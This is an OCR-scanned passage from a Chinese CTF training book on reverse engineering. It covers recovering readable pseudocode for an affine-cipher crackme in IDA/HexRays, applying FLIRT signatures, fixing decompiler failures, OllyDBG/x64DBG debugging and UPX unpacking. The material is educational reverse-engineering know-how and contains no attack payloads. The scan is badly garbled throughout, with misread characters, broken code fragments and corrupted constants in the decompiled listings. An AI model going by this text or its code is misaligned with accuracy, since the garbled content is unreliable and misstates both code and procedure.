puts("Wrong input length!"); 
result = 1; 


} 
return result; 
5-2-11 


注意 : IDA 一 般 允 许 使 用 符合 C 语 言语 法 的 标识 符 ,， 但 是 将 某 些 前 缀 作为 保留 使 用 ， 在 手动 指定 名 称 
时 ， 这 样 的 前 缀 不 能 被 使 用 ， 请 读者 在 被 提示 错误 后 根据 提示 换 一 个 名 称 。 


4. 切换 数据 显示 格式 


重 命 名 后 ，2-simpleCrackme.c 伪 代码 已 经 还 原 得 与 源 代码 相差 无 几 ( 见 图 5-2-12) 。 但 是 很 多 常量 
没有 以 正确 的 格式 显示 ， 如 源 代 人 码 中 的 0x66 变 为 十 进 制 数 102，'a'" 和 'A' 被 转化 为 其 ASCII 编 码 对 应 的 
十 进 制 数 97 和 65。 


HexRays 没 有 强大 到 可 以 自动 标注 这 些 常量 ， 但 是 HexRays 提 供 了 将 常量 显示 为 各 种 格式 的 功能 。 将 
光标 移动 到 一 个 常量 上 ， 然 后 单 击 右键 ， 在 弹出 的 快捷 菜单 中 选择 对 应 的 格式 ， 见 图 5-2-13。 


llint _ cdecl main(int argc, const char **argv, const char **envp) 
size t len; // rbx 
ax 
;77 [rsp+8h] [r ee Be 


3 A/A [Fr Be [rbp-Aeh] 
npveta6]; // [r [rbp-8eh] 
rsp+99h] [rbp- 


in rbp- 

unsigned _ int64 v11; // [Ir saa [rbp-18h] 
vil = _readfsqword(9x2; 

strcpy(TRUE ， ANS， 人 zxndl tnf_ddzbff!}"); 
et nput, 0, sizeof(input)); 


ee Input your answer: ", argv, &v10); 
i ”, input); 


ut); 
if ( len == 0 ANS) ) 
for (i= 0; i <= strlen(input); ++i ) 
if ( input[i] <= 96 || input[i] > 122 ) 


if ( input[i] <= 64 || input[i] > 98 ) 
enc = input[i]; 


enc = (102 * (input[i] - 65) + 3) % 26 + 65; 
else 

c = (102 * (input[i] - 97) + 3) % 26 + 97; 
if ( enc != TRUE ANS[i] ) 


pu answer!"); 
return 1; 


} 
puts("Congratulations!"); 
result = 0; 


} 
else 


图 5-2-12 
学 Hexadecimal: 十 六 进 制 显示 ， 快 捷 键 为 H 键 ， 可 以 将 各 种 其 他 显示 格式 转换 回 数 字 。 
学 Octal: 八进制 显示 


学 Char: 将 音量 转 为 形 如 和 A' 的 格式 ， 快 捷 键 为 R 键 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeeke3632bd0222e369853df322 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 


学 Enum: 将 音量 转 为 枚 举 中 的 一 个 值 ， 快 捷 键 为 M 键 。 

学 Invert sign: 将 帅 量 按照 补 码 解析 为 负数 ， 快 捷 键 为 键 。 

学 Bitwise negate: 将 常量 按 位 取 反 ， 形 如 C 语 言 中 的 ~ 0xF0， 快 捷 键 为 ~ 键 。 
手动 操作 转化 一 一 显示 格式 后 ， 反 编译 的 伪 代 码 与 源 代码 更 加 一 至， 见 图 5-2-14。 


Hexadecimal 

Octaol 

Char 

Enum 

Invert sian 
Bituise negate 
Structure offset 
Edit comment 

Edit block comment 
Hide casts 

Guess ouuocation 
Structures with this size 
Font... 


图 5-2-13 


if ( input[i] <= 64 || input[i] > 98 ) 
enc = input[i]; 
el]se 
enc = (@x66 * (input[i] - "A')+ 3)%26+ A 3 
} 


else 
enc = (@x66 * (input[i] - 'a')}+ 3)%26+ "a'; 


if ( enc != TRUE ANS[i] ) 
5-2-14 
HexRays 的 快捷 键 有 时 触发 不 了 ， 可 以 在 失败 时 尝试 使 用 右键 快捷 菜单 。 


本 节 配 套 文件 为 2-simpleCrackme_O3。 在 编译 器 优化 后 ， 恢 复 语 义 的 难度 会 成 倍增 加 。 纵 使 
极为 强大 ， 在 面 对 复 杂 的 编译 器 优化 时 也 经 常会 出 现 问 题 。 


HexRays 


本 证 使 用 GCC 编 译 器 开局 OQ3 优 化 开关 后 编译 生成 的 可 执行 文件 。 同 样 的 源 代码 经 过 复杂 的 编译 器 优 
化 流程 后 ， 生 成 的 伪 代 码 可 能 友 生 相当 大 的 变化 ， 见 图 5-2-15。 


nt _cdecl main(int argc, const char **argv, const char **envp 


_ int64 v3; // rsi 
unsigned int v4; // eax 

m128i v6; // [rsp+eh] [rbp-98h] 

_in ee v7; // [rsp+18h] [rbp-88h] 

3 // [rsp+18h] [rbp-8eh] 

har yo pe sp+28h] [rbp-78h] 
int v16; // [rsp+8eh] [rbp-1i8h 
unsigned _ int64 v11; // [rsp+88h] [rbp-1eh] 


vil = _readfsqword(9x28u); 

v7 = 7377593711185585774LL; 

v3 = 8200559 
memset(v9, 0, sizeof(v9)); 
v6 = mm load si128((const _ ml28i *)&xmmword_9F9); 
v10 = 0; 
__printf_chk(1LL，“Input your answer: ", envp); 

_isoc99 scanf("%s", v9); 
诗 ( strlen(v9) != 27 ) 


puts("Wrong input length!"); 
return 1; 


} 
v3 = OLL; 
do 


py 2 v9[v3]; 
if ( (unsigned _ int8)(v4 - 97) <= 9xl9u ) 


v4 = (192 * ((char)v4 - 97) + 3) % exlAu + 97; 
4: 
if ( v6.m128i i8[v3] != (_BYTE)v4 ) 
to LABEL 9; 
goto LABEL 5; 
4 i (unsign 二 _ int8)(v4 - 65) > @xl9u ) 
DO LABEL 
i 有 3] != (162 * ((char)v4 - 65) + 3) % exlAu + 65 ) 
{ 
EL_ 9: 
puts( "Wrong answer!"); 


return 1; 


EL_5: 
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图 5-2-15 
伪 代 码 对 开头 的 一 些 常量 进行 显示 格式 的 转换 ， 这 是 程序 中 的 字符 串 中 间 的 部 分 内 容 分 别 以 dword、 
qword 形 式 存储 。 实 际 上 ， 原 来 的 字符 串 赋值 操作 已 经 变 成 了 128 位 浮 点 数 赋值 +64 位 qword 赋 值 + 


32 位 dword 赋值 。HexRays 因 此 将 字符 串 数 组 识别 成 了 3 个 变量 : _m128i 类 型 的 v6，_int64 的 v7 
和 int 的 v8， 导 致 后 面 生 成 的 伪 代 码 的 阅读 性 差 。 


节 整 型 ，8 位 ,char、 _int8; 
型 ，16{y, short、 int16; 
dword-4 字 节 整 型 ，32 位 ，int、__int32; 
qword-8 字 节 整 型 ，64 位 ， int64、l|ong long。 


变量 V6、v7、vV8 实 际 上 是 整个 字符 串 数 组 。 如 果 用 户 能 够 正确 地 指定 变量 的 类 型 ， 则 反 编 译 的 准确 性 
和 可 读 性 将 大 大 提高 。 


HexRays 充 分 利用 了 前 面 介 绍 过 的 IDA 的 类 型 分 析 系统 ， 在 要 修改 类 型 的 标识 符 上 按 Y 键 ， 即 可 调 出 对 
话 框 来 修改 类 型 。 对 于 这 个 程序 ， 根 据 计 算 ， 实 际 上 这 3 个 变量 应 为 以 v6 开 头 的 一 个 长 度 为 28 (16+8 
+4) 的 char 数 组 ， 故 其 对 应 的 C 类 型 声明 为 char[28] (在 类 型 声明 中 可 以 省 略 标识 符 ) 。 


于 是 将 光标 移动 到 v6 上 ， 然 后 按 Y 键 ， 输 入 “char[28]”， 弹 出 是 否 履 善后 续 变量 的 确认 对 话 框 ， 单 
击 “Yes”′ 按钮 即 可 。 


再 次 重 命名 这 些 变 量 ， 融 可 以 得 到 可 读 性 相当 高 的 伪 代 码 ， 见 图 ?-2-16。 


int _cdecl main(int argc，const char **argv，const char **envp) 


_int64 v3; //r 

unsigned int ce LN 

char TRUE_ANS[28]; rsp+eh] [rbp-98h] 
char input[96]; // ff ro [rbp-78h] 

int v8; // [rsp+89h] [rbp-18h] 

unsigned _ int64 v9; // 记 ee [rbp-18h] 


v9 = _readf 

*(_QWORD *)&TRUE ， ANS[16] = = 7377593711185585774LL; 

*(_DWORD *)&TRUE ANS[24] = 8200550; 
memset(input, 0, sizeof(input)); 

-A i *)TRUE ANS = mm load si128((const _ ml28i *)&xmmword 9F9)3 
ve = 
printf Ee EE your answer: ", envp); 
anf(“%s", input); 
i [4 Te t) 27 


puts("Wrong input length!") 
return 1; 
: = QLL; 
do 
人 LOBYTE(enc) = input[v3]; 
if ( (unsigned _ int8)(enc - 'a’) <= 25u ) 
enc = (Ox66 * ((char)enc - "a") + 3) % 26uU + 'a'; 
BEL 4: 
if ( TRUE ANS[v3] l= (_BYTE)enc ) 
goto LABEL 9; 
goto LABEL_5; 


( ogee __int8)(enc - 'A') > 25u ) 


有 NS 3 l= (Ox66 * ((char)enc - 65) + 3) % 26u + 'A' ) 
上 


BEL_9: 
puts("Wrong answer!"); 
return 1; 
BEL 5: 
++tVv33 


me ( va 1= 28 ); 


puts("Congratulations!"); 
return 0; | 


图 5-2-16 
HexRays 不 只 支持 局 部 变量 的 类 型 修改 ， 也 支持 修改 参数 类 型 、 了 水 数 原型 、 全 局 变量 类 型 等 。 实 际 
上 ，HexRays 不 仅 文 持 这 些 简单 的 类 型 ， 还 广 持 结构 体 、 枚 举 等 C 语 言 类 型 。 按 shift+ F1 组 合 键 ， 调 
出 Local Types 窗 口 ， 从 中 可 以 操作 C 的 各 种 类 型 : 按 Insert 键 ,或 者 单 击 右键 ,弹出 添加 类 型 的 对 话 
框 ， 见 图 5-2-17， 从 中 输入 符合 C 语 言 简单 语法 的 类 型 后 ，IDA 会 解析 并 和 存储 其 中 的 类 型 。 此 外 ， 人 
+F9 组 合 键 或 选择 “File 一 Load File 一 Parse C header file” 菜单 命令 ， 可 以 加 载 C 语 言 的 头 文 
件 。 


tebe 
uot attribute a {unsi med _int32 st_neneiunsigned _int6 st_info… 
wsigned _i Ed r_info,_int64 r. a } 
d 和 2 eS t64 
union attribute__((aligned(8))) {unsigned _int64 m64_u64;float n64_f32[2];_ 
union attr: RE 二 gned(16))) {float al128 2[4]: i int64 m128 dr 
struct {double m 3 
union —attri be (els sned(16))) {_int6 m126i_i8[16];:_int16 ml26i_il6[6];_int32… 
i [8] * 


加 现 出 属 加 加 开国 同属 三 
PE 
2 


union _ attribute_{((aligned(32))) {_int8 n256i 多 这 int16 nm256i_il6[16]:_int3… 
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图 5-2-17 
添加 目 定 义 类 型 后 ， 在 设置 变量 类 型 时 使 用 这 些 类 型 ，HexRays 会 目 动 根 据 类 型 进行 相应 的 解析 操 


作 ， 如 显示 结构 体 的 访问 、 显 示 枚 举 等 。 


在 遂 向 过 程 中 可 能 出 现 各 种 类 型 识别 错误 的 情况 ， 我 们 需要 利用 CC 语言 编 程 的 经 验 ， 来 正确 地 设置 结 
构 体 、 普 通 撒 针 、 结 构 体 指针 、 整 型 等 变量 。 


HexRays 的 类 型 变化 一 般 情 况 下 可 以 将 一 个 变量 的 长 度 强行 增加 (如 上 文 所 说 的 改 为 char[28]) ， 但 
是 将 一 个 长 的 变量 改 短 时 往往 会 报警 “Sorry，can not change variable type” (如 将 上 文 的 char[ 
] 的 变量 改 回 char[27]， 则 会 报错 ) ， 所 以 将 变量 加 长 时 需要 谨慎 。 如果 不 愤 修 改 错误 ， 可 以 删除 函 
数 后 ， 再 定义 函数 ， 以 重 置 该 函数 的 各 种 信息 。 


6. 完成 分 析 


在 将 伪 代 码 微 调 到 适合 自己 阅读 的 程度 后 ， 即 可 开始 分 析 。 显 然 ， 这 个 程序 实现 了 仿 射 密码 ， 求 逆 的 
方法 也 很 简单 ， 不 再 殴 述 ， 请 读者 目 行 完 成 解密 。 


5.2.3 IDA 和 HexRays 进 阶 


上 面 介绍 的 是 IDA 和 HexRays 的 基本 操作 ， 下 面 介 绍 一 些 常 见 问 题 的 处 理 方法 。 
1. 如 何 找 main 函 数 


人 在 Windows 和 和 Linux 下 ， 很 多 可 执行 文件 都 不 是 直接 从 main0 遂 数 开始 执行 的 ， 而 是 经 过 CRT (C 语 
言 运 行 时 ) 的 初始 化 ， 再 转 到 main() 冰 数 。 


找 main(0 国 数 的 近 巧 如 下 : 


学 main(0 阔 数 经 单 在 可 执行 文件 的 靠 前 位 置 (因为 很 多 链接 器 是 先 处 理 对 象 文件 后 处 理 静 态 
[证] 


学 VC 的 入 口 点 (IDA 中 的 start0 函 数 ) 会 直接 调用 main() 消 数 ， 在 start() 立 数 中 被 调用 的 泛 
数 有 3 个 参数 ， 并 且 返 回 值 被 传 入 exit() 遂 数 的 ， 可 以 重点 查看 。 


学 GCC 将 main() 函 数 的 地 址 传 入 _libc start main 来 调用 main() 函 数 ， 查 看 调用 的 参数 即 可 
找到 main() 阔 数 的 地 址 。 


2. 手动 应 用 FLIRT 签 名 


在 IDA 中 ， 有 一 类 逆 数 与 众 不 同 : 图 数列 表 中 的 底 色 为 青色 ， 在 导航 条 中 的 对 应 区 域 也 会 显示 为 青 
色 。 这 实际 上 是 IDA 的 FLIRT 函 数 签名 识别 库 在 起 作用 .。 


按 Shift+F5 组 合 键 ， 可 以 打开 Signature 列 表 ， 其 中 会 显示 已 经 应 用 的 函数 签名 库 ， 见 图 5-2-18。 碍 
看 导航 条 可 以 发 现 ，VC 运 行 时 的 代码 有 很 多 没有 识别 ， 见 图 5-2-19。 这 是 因为 IDA 没 有 自动 为 这 个 程 
序 应 用 其 他 VC 运行 时 的 签名 。 实 际 上 ， 这 个 文件 是 由 VS2019 Preview 生 成 的 ， 而 IDA 7.0 是 在 2017 
年 发 布 的 ， 故 对 最 新 版 的 VS 支持 较 差 。 
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Sr 2S 


brary function 国 Regalar function BN Instruction Data MM Unexplored Externs 


ctions window 


ion name 
ocal_stdio printf options 


vocal stdio secanf options 


图 5-2-19 
实际 上 ，1IDA 完 全 可 以 正常 识别 后 面 的 大 部 分 函数 。 在 刚才 打开 的 辫 数 签名 库 列 表 中 按 Insert 键 ,可 
以 新 增 需 要 匹配 的 阔 数 签名 库 ， 见 图 ?-2-20。 


Es 


Fibe 0ptit Library name 
FH| sm16strm Symantec v6.x/?.2 stream classes 16bit 
| sm32rw32 Symantec v7.2 win32 runtime 
I tpdos Turbo Pascal Y¥5.0/5.5/6.0/7.0 
| tpdpmi Turbo Pascal V7.0 
| tpowl OWL for TPW VY6.0AV7.0 
| tpsige2 Turbo Pascal Startup 
A tpsis2n Turbo Pascal HE Startup 
Turbo Vision for TP 6.0/7.0 
Turbo Vision for TP Y7.0 
Turbo Pascal for Windows Y6.0/Y?.0 
UniLimk Features 
UniLimk Features (64bit) 
P| vac35wc IEM Visual Age v3.0 for Windows 
| vc32_14 Microsoft VisualC 14/net runtime 
| vc32mfc MFC 3.1-14.0 32bit 
| vc32mfce Windows CE runtime & MFC for X86ENM 
Wve32rtf Microsoft VisualC 2-14/net runtime 
| Yc32ucrt Microsoft VisualC universal runtime 
| vc432cab SDK CAB-library 
| vcd432opg YC4. x/5.0 OpenGL 
| vc432tap YC4.2/5.0 commuticate library 
vc64_14 Microsoft VisualC v14 64bit runtime 
| vc64atl YC?/14 ATL 64bit support library 
| vc64ex… VC7V14 Extra (techology) 64bit library 
| vc64mfc MFC 7-14 64bit 
P| vee6artf Microsoft VisualC v?/14 64bit runtime 
| vc64seh SEH for vc64 ?7-14 
| vc64ucrt Microsoft VisualC 64bit universal runtime 
| vc7at1 VC7 ATL support library 
| vc8at1 YC8/14 ATL support library 
[P| veextra YC6/14 Extra (techology) library 


A veseh SEH for vc7-14 . 
ar TRFN_1i 


[ewe [Las | [ wis | 
vceu4 


图 5-2-20 
按照 摘 述 应 用 合适 的 国 数 等 名 库 ， 即 可 识别 出 大 量 的 函数 ， 见 图 ?-2-21。 


3. 处 理 HexRays 失 败 情况 


本 节 配 套 文件 为 3-UPX packed dump SCY.exe。 


Library function 团 Regular function 国 Instruction DM Data DA Unexplored Fxternal symbol 
Functions window IDA View-A 加 pe List of applied library modules 加 回 


Function nome . Stote #func Librory nome 
local_stdio_printf_options Yec64seh Applied 
local stdio_ scanf options g 攻 Applied Microsoft VisualC v14 64bit runtime 
printf£ | Applied Microsoft VisualC v7/A14 64bit runtine 
scanf | Applied Microsoft VisualC 64bit universal runtime 
base64_decode 
main 
_security check cookie 

天 | _raise_securityfailure 
_report gsfailure 
capture_previous_context 
pre_c_initialization 
post pgo_initialiration 
pre_cpp_initialization 
_scrt_conmon_main_seh 
mainCRTStartup 
__Scrt_acquire_startup_ lock 
rt_initialize crt 
__Sort_initialize onexit tables 
_scrt is norwritable in current image 
_scrt release_startup_lock 
_scrt uninitialirze_crt 
_onexit 
atexrit 
_security init cookie 
seort initialize wirrt 
_get_startup argv_mode 


图 5-2-21 
HexRays 经 弟 会 出 现 各 种 失败 情况 ， 尤 其 是 对 于 没有 符号 、 优 化 等 级 较 高 的 程序 。 绝 大 多 数 出 错 的 原 
因 是 与 这 个 函数 相关 的 某 些 参数 设置 错误 ， 如 这 个 函数 中 调用 其 他 函数 的 调用 约定 出 现 错误 ， 导 致 参 
数 解 析 失 败 或 调用 前 后 栈 不 平 稀 。 


例如 ， 一 个 使 用 _stdcall 的 函数 被 误 认 为 使 用 cdecl 调 用 约定 ， 两 个 调用 约定 清理 参数 空间 的 方法 不 
一 样 ， 导 致 跟踪 栈 指针 时 出 现 问题 ;又 如 ， 一 个 thiscall 被 错误 地 识别 成 了 fastcall， 则 函数 会 多 出 
一 个 不 存在 的 参数 ; 或 者 因为 种 种 原因 ， 基 个 _fastcall 函 数 被 错误 识别 成 了 _cdecl 函 数 ， 而 参数 个 
数 都 是 1， 这 时 反 编 译 器 没有 办 法 找到 在 栈 上 的 参数 ， 因 为 它 实 际 上 是 使 用 的 寄存 器 传 参 。 
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下 面 分 为 两 种 情况 为 读者 简要 介绍 。 
(1) call analysis failed ( 见 3-UPX packed dump SCY.exe) 


首先 ， 使 用 前 文 提 到 的 找 main(0) 立 数 的 技巧 ， 可 以 快速 在 start() 遂 数 中 找到 对 main(0 遂 数 的 调用 ， 见 
图 5-2-22。 定 位 到 main() 函 数 后 进入 ， 见 图 5-2-23，。 


站 | DEV 
(_DWORD *) p argc(); 
sub 271666(*v11，Vv186，Vv9) ; 


iy 
cexit(); 
sub 27186F(1, 8); 
*( DWORD *)(al - 4) = -2 
result = a2， 


图 5-2-22 


图 5-2-23 
假如 将 sub 271010 的 类 型 从 原来 的 “int thiscall sub 271010 ( dword) ” 改 为 “int cdedl 
_271010 ( dword) ”， 则 反 编 详 器 会 目 动 重新 反 编译 进行 刷新 ， 弹 出 “call analysis failed” 
的 提示 ， 见 图 5-2-24。 


实际 上 ， 其 错误 的 根源 是 反 编 译 器 在 寻找 函数 调用 的 参数 的 时 候 出 现 了 错误 ， 这 时 只 需 根据 对 话 框 前 
面 的 地 址 ， 找 到 出 销 的 位 置 ， 然 后 修复 阔 数 的 原型 声明 即 可 。 本 例 出 钳 的 地 址 为 0x271006， 按 G 键 跳 
转 到 目标 地 址 ， 可 以 看 到 “call sub 271010”， 正 好 为 刚才 修改 的 函数 。 将 sub_271010 的 函数 原 
型 改 回 原来 的 ， 即 可 重新 正 单 反 编译 。 


Decompilation failure: 
271006: call analysis failed 


Please refer to the manual to find appropriate actions 


[La | 
图 5-2-24 
(2)sp-analysis failed 
这 种 销 误 的 原因 是 ， 当 优化 等 级 较 高 时 ， 编 译 器 将 省 上 略 帧 指针 rbp 的 使 用 ， 转 而 使 用 rsp 引 用 所 有 的 局 
部 变量 。 为 了 找到 局 部 变量 ，1DA 通 过 跟踪 每 条 指令 对 rsp 的 修改 来 查找 并 解析 局 部 变量 。 但 是 IDA 人 在 
跟踪 rsp 时 出 现 了 问题 ， 导 致 反 编 译 失 败 。 


一 般 情 况 下 ， 这 种 问题 的 根源 是 某 个 函数 调用 的 调用 约定 出 错 ， 或 该 函数 的 参数 个 数 出 错 ， 导 致 IDA 
算 错 了 栈 指 针 的 变化 量 。 
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让 允 种 | 依 兄 国志 译 
”， 见 图 5-2-25，。 
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“Options General ”菜单 命令 ， 在 弹出 的 对 话 框 中 勾 选 “Stack ”. 
pointer 


Disassembly Analysis Cross-references Strings Browser Graph Misc 


Address representation Display disassembly line parts 


| Line prefixes (non-graph) 


Stack pointer 
| Comments 
加 | Repeatable comments 


DD Function offsets 
串 Include segment addresses 
器 Use segment names 


Display disassembly lines 

[MM Empty lines 

区 Borders between data/code (non-graph) 
[|] Basic block boundaries (non-graph) 


| Auto comments 
Number of opcode bytes (non-graph) I0 


Instruction indentation (non-graph) |16 

40 | 
I70 | 
4 | 


[ Source line numbers 


Fa me ok dok Comments indentation (non-graph) 


Right margin (non-graph) 
Line prefix example: Seg000:0FE4 


Low suspiciousness limit |0x271000 
High suspiciousness limi I|0x27A000 


Spaces for tabulation 


rr 


图 5-2-25 
然后 ， 反 汇编 窗口 每 行 的 地 址 旁边 会 多 出 一 列 ， 即 IDA 分 析 的 阔 数 执行 
图 ?-2-26。 对 于 没有 使 用 动态 长 度数 组 的 正音 程序 ， 企 初始 化 完毕 


到 每 个 地 址 时 栈 的 偏 移 量 ， 
调用 前 后 栈 的 偏 移 量 不 变 。 

读者 在 遇 
快速 


到 这 种 间 题 时 ， 只 需 一 点 点 看 完 这 些 栈 指针 ， 将 其 


束 找 出 有 问题 的 地 方 ， 并 相应 进行 修改 ， 即 可 大 功 告 成 。 


与 正常 栈 指针 的 变化 规律 相 比 较 ， 束 可 以 


4. 探索 1DA 的 其 他 功能 


IDA 能 干 的 工作 远 远 不 止 于 此 ， 
不 同 地 方 的 右键 快捷 菜单 ， 


读者 可 以 了 解 更 多 IDA 的 功能 和 使 用 方式 ， 如 : 翻阅 IDA 的 菜单 ， 查 看 
查看 “Options 一 Shortcuts” 中 显示 的 所 有 快捷 键 的 列表 等 。 


UPX6:66271616 6966 ebp 

UPX6:66271611 964 ebp，esp 

UPX6:66271613 884 QFFFFFFFFh 
UPX6:66271615 6888 offset SEH_271616 
UPX6:6627161A eeC eax, large fs:6 
UPX6:662719268 88C eax 

UPX6:66271621 6916 esp，26h 

UPX6:66271624 936 ebx 

UPX6:66271625 834 esi 

UPX6:66271626 838 edi 

UPX6:66271627 83C eax，_ security_cookie 
UPX6:6627162C 83C eax，ebp 

UPX6:6627162E 83C eax 
UPX6:6627162F eax， 
UPX6:66271632 
UPX6:66271638 
UPX6:6627163B 
UPX6:6627163D 
UPX6:66271646 
UPX6:66271642 
UPX6:692716949 
UPX6:6627164C 
UPX6:6627164E 


[ebp+var_C] 
large fs:0, eax 
[ebp+var_16]，esp 
ebx, ecx 
[ebp+var_14], ebx 
ecx, [ebx] 
[ebp+var_24], 8 
eax, [ecx+4] 

eax, ebx 
[ebp+var_18], eax 


UPX6:66271651 
UPX6:66271654 
UPX6:66271657 
UPX6:66271659 
UPX6:6627165B 


”UPX6:6627165D 


UPX6:6627165F 


”UPX6:66271661 


UPX6:66271663 
UPX6:66271665 
UPX6:66271667 
UPX6:6627166A 
UPX6:66271665C 
UPX6:66271665 
UPX6:66271665C 


”UPX6:66271665 
UPX6:6627166F 


UPX6:66271672 


loc_27186C: 


edi, [eax+24h] 
esi, [eax+28h] 
edi, edi 

short loc 271674 
short loc_27186C 
esi, esi 

short loc_271674 
edi, edi 

short loc_271674 
short loc_27186C 
esi, 8Dh 

short loc_271674 


; CODE XREF: sub_271618+4B1j 
; sub_271616+551j 


esi, Dh 
edi, 9 
short loc_271682 


图 5-2-26 
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5.3 动态 调试 和 分 析 

逆向 分 析 的 另 一 种 基本 方法 是 动态 分 析 。 所 谓 动态 分 析 ， 融 是 将 程序 实际 运行 起 来 ， 观 察 程序 运行 时 
的 各 种 行为 ， 从 而 对 程序 的 功能 和 算法 进行 分 析 。 这 需要 被 称 为 调试 器 的 软件 ， 调 试 器 可 以 在 程序 运 
行 时 观察 程序 的 寄 仓 器 、 内 人 存 等 上 下 文 信息 ， 还 可 以 让 程序 在 指定 的 地 址 停止 运行 等 。 本 节 将 介绍 去 
态 调试 的 基本 方法 和 单 见 的 调试 器 的 使 用 。 


5.3.1 调试 的 基本 原理 

曾经 用 过 IDE 的 调试 器 的 读者 想必 知道 调试 的 各 种 操作 : 在 感 兴趣 的 地 方 设置 断 点 ， 使 得 程序 中 断 ; 
然后 一 行 行 跟踪 程序 的 执行 ， 根 据 需要 ， 选 择 进 入 一 个 函数 或 略 过 一 个 函数 ; 在 跟踪 的 过 程 中 查看 程 
序 各 变量 的 值 ， 从 而 了 解 程序 的 内 部 状态 ， 方 便 找到 | 问题。 

没有 源 代 码 的 调试 过 程 大 同 小 异 。 不 过 之 前 的 源 代码 级 别 的 跟 踊 变 成 了 汇编 语句 级 别 的 跟 路 ， 查 看 的 
是 寄存 器 、 栈 、 其 他 内 存 ， 而 不 是 已 知 符号 信息 的 变量 。 


5.3.2 OIlyDBG 和 x64DBG 调 试 


OllyDBG 和 x64DBG 都 是 调试 Windows 平 人 台 可 执行 文件 的 调试 器 。x64DBG 为 后 起 之 秀 ， 支 持 32 位 和 
64 位 程序 的 调试 ， 并 且 在 不 断 开发 、 添 加 新 的 功能 ， 而 OllyDBG (下 文 简称 OD) 仪 支 持 32 位 程序 ， 
且 已 经 停止 更 新 。 


OD 似 乎 并 没有 存在 的 必要 了 ， 但 是 由 于 发 布 时 间 较 早 ， 有 着 大 量 的 社区 贡献 的 用 来 实现 脱 壳 、 对 抗 
反 调 试 等 高 级 功能 的 脚本 和 插件 ， 使 得 其 仍然 有 一 定 的 用 武之 地 。 


x64DBG 与 OD 有 相似 的 界面 和 功能 、 高 度 重合 的 快捷 键 ， 两 者 放 在 一 起 学 习 更 加 方便 。 


x64DBG 有 自己 的 官方 网 站 ， 直 接 下 载 即 可 ; OD 非 官 方 的 民间 修改 版 本 较为 流行 。x64DBG 分 为 两 
个 版 本 ,分 别 调试 32 位 和 64 位 程序 ;OD 只 有 一 个 版 本 ， 直 接 运 行 即 可 。 


1. 打开 文件 


打开 调试 器 后 ， 可 以 上 友 现 两 个 调试 器 的 界面 分 布 大 致 相同 。 用 户 可 以 将 文件 拖 入 主 界面 ， 也 可 以 使 用 
菜单 栏 打开 文件 。 


打开 文件 后 ， 各 窗口 中 会 有 内 容 出 现 。x64DBG 与 OD 的 布局 相同 ， 左 上 区 域 为 反 汇 编 结 果 的 显示 区 
域 ， 左 下 区 域 为 浏览 程序 内 存 数据 的 区 域 ， 右 下 区 域 为 栈 数据 的 显示 区 域 ， 右 上 区 域 为 寄存 器 的 显示 
区 域 。 


2. 控制 程序 运行 


按 Ctrl+G 组 合 键 ， 可 以 跳 转 到 目标 地 址 ; 在 反 汇 编 窗口 中 ， 按 F2 键 为 切换 当前 地 址 的 断 点 状态 ， 按 F8 
键 为 单 步 步 过 ， 按 F7 为 单 步 步 入 ， 按 F4 键 为 运行 到 光标 处 位 置 ， 按 F9 键 为 运行 。 


常见 的 断 点 位 置 包 括 程 序 内 的 某 个 地 址 、 程 序 调 用 的 某 个 APl。 此 外 ， 可 以 让 程序 在 操作 ( 读 取 / 写 
入 /执行 ) 特定 的 某 一 小 段 内 存 时 中 断 ， 其 原理 为 使 用 CPU 内 建 的 硬件 断 点 机 制 或 使 用 Windows 提 供 
的 异 弟 处 理 机 制 的 内 人 存 断 点 。 两 者 效果 类 似 ， 硬 件 断 点 速度 较 快 ， 但 是 数量 有 所 限制 ， 在 可 以 使 用 硬 


件 断 点 时 应 尽量 使 用 。 具 体 的 操作 都 很 简单 ，x64DBG 在 内 存 窗口 / 栈 窗 口中 选 定 目标 地 址 ， 然 后 单 击 
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右键 ， 在 弹出 的 快捷 菜单 中 选择 “ 断 点 一 硬件 断 点 ”或 “ 读 取 / 写 入 一 选择 长 度 ”， 可 以 设置 硬件 读 
取 和 硬件 写 入 断 点 ; 在 反 汇 编 窗 口中 ， 右 击 目标 地 址 ， 在 弹出 的 快捷 菜单 中 选择 “Breakpoint 一 Set 
hardware on execution”， 设 置 硬件 执行 断 点 。OllyDBG 的 操作 类 似 ， 但 它 不 能 在 栈 窗 口中 设置 
断 点 。 


伪 代 码 可 以 帮助 用 户 更 好 地 理解 程序 的 反 汇 编 ， 其 余 调试 过 程 与 普通 的 调试 程序 没有 区 别 ， 在 此 不 再 
详细 讲解 。 


3. 简单 的 脱 壳 


本 节 配 套 文 件 为 3-UPX。Windows 下 调试 的 一 大 特殊 应 用 场景 就 是 脱 计 。“ 壳 ”是 一 种 特殊 的 程 
序 ， 对 男 一 个 程序 进行 变换 后 ， 利 用 变换 的 结果 重新 生成 可 执行 文件 。 在 运行 时 ， 它 全 部 或 部 分 还 原 
存储 在 可 执行 文件 中 的 变换 结果 ， 然 后 恢复 原 程序 的 执行 。 充 的 存在 主要 是 两 方面 的 需求 ， 压 缩 这 为 
了 减 小 程序 体积 ， 加 密 过 则 是 为 了 加 大 破解 者 的 逆向 难度 。 通 常 ， 加 密 壳 需要 配合 压缩 过， 加 密 膏 会 
导致 程序 体积 变 大 。 


按照 变换 操作 的 不 同 ， 壳 的 种 类 如 下 : 有 的 过 注重 对 代码 的 压缩 ， 从 而 生成 更 小 的 可 执行 文件 ， 各 
、ASPack 等 ; 有 的 过 注重 对 代码 的 保护 ， 以 阻碍 逆向 者 进行 分 析 为 目的 ， 如 VMP、ASProtect 等 。 


将 这 样 的 “这 ” 去 除 ， 还 原 为 最 初 程序 的 样子 ， 即 “ 脱 壳 ”。 由 于 加 密 壳 的 复杂 性 需要 丰富 的 
进行 处 理 ， 且 CTF 中 出 现 加 密 过 的 概率 较 小 ， 因 此 在 此 不 做 深入 讲解 。 


本 节 主 要 讲解 使 用 最 广泛 的 UPX 这 。UPX 是 一 个 开源 的 历史 您 久 的 压缩 这 ,支持 各 种 平台 、 各 种 架 
构 ， 使 用 特别 广泛 。 


脱 过 UPX 的 两 种 方法 如 下 。 


静态 方法 : UPX 本 身 即 提供 脱 这 器 ， 使 用 命令 行 参数 -d 即 可 ， 但 是 有 时 会 失败 ， 需 要 切换 使 用 正确 的 
UPX 版 本 。Windows 下 内 置 多 个 UPX 版 本 的 第 三 方 的 图 形 化 界面 UPXShell 工 具 ， 可 以 方便 地 切换 版 
本 。 


